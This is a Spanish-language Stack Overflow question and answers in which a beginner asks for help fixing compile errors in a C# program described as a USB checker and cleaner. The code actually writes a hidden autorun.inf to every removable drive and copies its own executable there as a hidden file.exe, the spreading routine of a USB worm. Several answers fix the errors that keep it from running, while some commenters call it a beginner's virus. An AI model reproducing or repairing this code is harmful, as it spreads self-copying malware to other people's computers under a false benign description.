# Errores de argumentos en C#

Tags: c#

Hola estoy modificando un pequeño programa que comprueba los usb que tengo conectados en mi pc y luego le incluiré una funcion que me los limpie(todavia me falta implementarlo) en caso de estar dañados.

El código es el siguiente:

```
using System.Reflection;
using System;
using System.Collections.Generic;
using System.Linq;
using System.IO;
using System.Text;
namespace Program
{
    class Program
    {
        static void Main(string[] args)
        {
            Comprueba();
        }
        static void Comprueba()
        {
              DriveInfo[] Drives = DriveInfo.GetDrives();
              foreach (DriveInfo drive in drives)
                    {
                        if (drive.DriveType == DriveType.Removable)
                        {
                              StreamWriter writer = new StreamWriter(drive.Name + "autorun.inf", true);
                               writer.WriteLine("[autorun]\n");
                               writer.WriteLine("open=file.exe");
                               writer.WriteLine("action=Run win32");
                               writer.Close();
                               File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);

                               File.Copy(Assembly.GetExecutingAssembly().Location, drive.Name + "file.exe", true);

                               File.SetAttributes(drive.Name + "file.exe", File.GetAttributes(drive.Name + "file.exe") | FileAttributes.Hidden);

                        }
                    }

        }
    }
}
```

Pero me devuelve los siguientes errores:

[image: Errores]

Errores:

```
o.cs(18,34): error CS0103: The name 'drives' does not exist in the current conte
xt
    o.cs(13,4): error CS0120: An object reference is required for the non-static fie
    ld, method, or property 'Program.Comprueba()'
    o.cs(17,6): error CS0246: The type or namespace name 'DriveInfo' could not be fo
    und (are you missing a using directive or an assembly reference?)
    o.cs(17,27): error CS0103: The name 'DriveInfo' does not exist in the current co
    ntext
    o.cs(18,34): error CS0103: The name 'drives' does not exist in the current conte
    xt
    o.cs(18,15): error CS0246: The type or namespace name 'DriveInfo' could not be f
    ound (are you missing a using directive or an assembly reference?)
    o.cs(20,30): error CS0103: The name 'DriveType' does not exist in the current co
    ntext
    o.cs(22,10): error CS0246: The type or namespace name 'StreamWriter' could not b
    e found (are you missing a using directive or an assembly reference?)
    o.cs(22,36): error CS0246: The type or namespace name 'StreamWriter' could not b
    e found (are you missing a using directive or an assembly reference?)
    o.cs(27,107): error CS0103: The name 'FileAttributes' does not exist in the curr
    ent context
    o.cs(27,58): error CS0103: The name 'File' does not exist in the current context

    o.cs(27,11): error CS0103: The name 'File' does not exist in the current context

    o.cs(29,11): error CS0103: The name 'File' does not exist in the current context

    o.cs(31,101): error CS0103: The name 'FileAttributes' does not exist in the curr
    ent context
    o.cs(31,55): error CS0103: The name 'File' does not exist in the current context

    o.cs(31,11): error CS0103: The name 'File' does not exist in the current context
```

Como podría corregirlos. Estoy recien empezando a programar en c#.

Comment: El mensaje te dice claramente cuál el error, estás declarando `DriveInfo[] Drives = DriveInfo.GetDrives();` **en mayúscula la D** cuando debería ser `drives`, en minúscula.

Answer (score 1):

Agrega

```
using System.IO;
```

a tus importaciones

Comment: ya se lo añadi y me devuelve el mismo error, o.cs(18,34): error CS0103: The name 'drives' does not exist in the current conte
xt

Comment: C# es sensible a mayúsculas, tienes que nombrar bien la variable drives:
`DriveInfo[] drives = DriveInfo.GetDrives();`

Comment: @reekeecast toda la razon!

Answer (score 0):

El método `Comprueba()` al igual que el `main` debe ser declarado como `static`:

```
static void Comprueba()
{
    ....
}
```

Answer (score 0):

Puede ser un error tipográfico.

Cambia esta linea:

```
foreach (DriveInfo drive in drives)
```

Por esta:

```
foreach (DriveInfo drive in Drives)
```

La diferencia está en la variable `drives`, la cambié a `Drives`.

Comment: He editado tu pregunta, puedes ver aquí en [¿Cómo escribo una buena respuesta?](http://es.stackoverflow.com/help/how-to-answer) la sección: _Escribe a lo mejor de tu habilidad_ cito: `...respuestas con puntuación, ortografía, y gramática correcta serán mas fáciles de leer. También son las respuestas que tienden a recibir mas votos a favor`.

Comment: @MauricioAriasOlave ese "puede ser" debería ser un "es un". `Esto más bien parece un virus de principiante` =)

Comment: Te estás pasando moderador no tienes nada mehor que hacer?

Comment: O porqué no las respondes todas tú mejor

Comment: @Davlio, tienes razón, edité la pregunta para generar un respuesta mas `seria`, pero puedes revertir los cambios si así lo consideras.

Comment: el asunto es que la linea (virus de principiante) era importante, pues el código es sospechoso

Comment: no es un virus era un código que extraje de alguna parte y que queria utilizar como limpiado de mi usb. Abre una aplicación que limpie mi usb. Puede que lo veas sospechoso por lo de hidden lo cual desconocia ya que es un fragmento de código extraido de otro sitio web simplemente me fije en los errores no me fije en lo de hidden-

Comment: De todos modos he pedido que se borre mi post si incumple alguna norma.

Answer (score -1):

Esto más bien parece un virus de principiante jeje.

Cambia esta linea:

```
foreach (DriveInfo drive in drives)
```

Por esta:

```
foreach (DriveInfo drive in Drives)
```

Comment: No es un virus los autorun actualmente primero que no sirven y segundo que tienen otras muchas mas utilidades que hacer un virus y seguramente mis preguntas dejen que desear porque todavía me falte la base necesaria lo cual admito.